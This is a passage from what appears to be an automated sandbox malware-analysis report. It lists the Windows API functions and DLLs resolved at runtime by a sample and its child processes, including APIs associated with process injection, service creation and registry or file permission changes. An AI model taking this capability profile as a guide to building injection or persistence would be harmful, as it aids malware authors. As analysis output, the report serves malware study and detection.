00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00003436)\n \"qhdkbaei.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00003436)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter InitHelperDll (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CryptEnumProvidersW (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceConfigW (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpInitialize (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter RegisterGPNotification (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter UnregisterGPNotification (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter SetThreadUILanguage (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter HttpTerminate (UID: 00000000-00002232)\n \"netsh.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002232)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalA (UID: 00000000-00002564)\n \"svchost.exe\" called \"GetProcAddress\" with a parameter DnsQuery_A (UID: 00000000-00002564)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"KERNEL32.DLL\" at base 75bb0000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"WS2_32.DLL\" at base 76120000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"DBGHELP.DLL\" at base 6e890000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"USER32.DLL\" at base 759e0000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"ADVAPI32.DLL\" at base 761e0000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"SHELL32.DLL\" at base 76460000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"OLEAUT32.DLL\" at base 76080000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"MSVCR100.DLL\" at base 6a3f0000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"NTDLL.DLL\" at base 77550000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"OLE32.DLL\" at base 76300000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"CRYPTBASE.DLL\" at base 75350000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f30000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"PROPSYS.DLL\" at base 74070000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"COMCTL32.DLL\" at base 74350000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"APPHELP.DLL\" at base 75300000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"CLBCATQ.DLL\" at base 75950000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a7d0000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75bb0000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"SETUPAPI.DLL\" at base 75ed0000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"RPCRT4.DLL\" at base 75850000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74070000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"NTMARTA.DLL\" at base 748c0000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77760000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"PROFAPI.DLL\" at base 75460000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 756f0000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 77400000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"SECUR32.DLL\" at base 75180000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 754a0000\n \"25c97105d482ed561e53b782cfeb071336e9ffc9e9966a962bd9ef492e69e035.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75300000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ae0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 75bb0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 76290000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 77780000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ae0000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 75bb0000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"qhdkbaei.exe\" loaded module \"KERNEL32.DLL\" at base 75bb0000\n \"qhdkbaei.exe\" loaded module \"WS2_32.DLL\" at base 76120000\n \"qhdkbaei.exe\" loaded module \"DBGHELP.DLL\" at base 6e890000\n \"qhdkbaei.exe\" loaded module \"USER32.DLL\" at base 759e0000\n \"qhdkbaei.exe\" loaded module \"ADVAPI32.DLL\" at base 761e0000\n \"qhdkbaei.exe\" loaded module \"SHELL32.DLL\" at base 76460000\n \"qhdkbaei.exe\" loaded module \"OLEAUT32.DLL\" at base 76080000\n \"qhdkbaei.exe\" loaded module \"MSVCR100.DLL\" at base 6a3f0000\n \"qhdkbaei.exe\" loaded module \"SSPICLI.DLL\" at base 752e0000\n \"qhdkbaei.exe\" loaded module \"RPCRT4.DLL\" at base 75850000\n \"qhdkbaei.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77760000\n \"qhdkbaei.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75300000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 73170000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6cde0000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 75bb0000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6cdc0000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6cc30000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 6b560000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75bb0000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6cbf0000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 6bac0000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6c150000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6baa0000\n 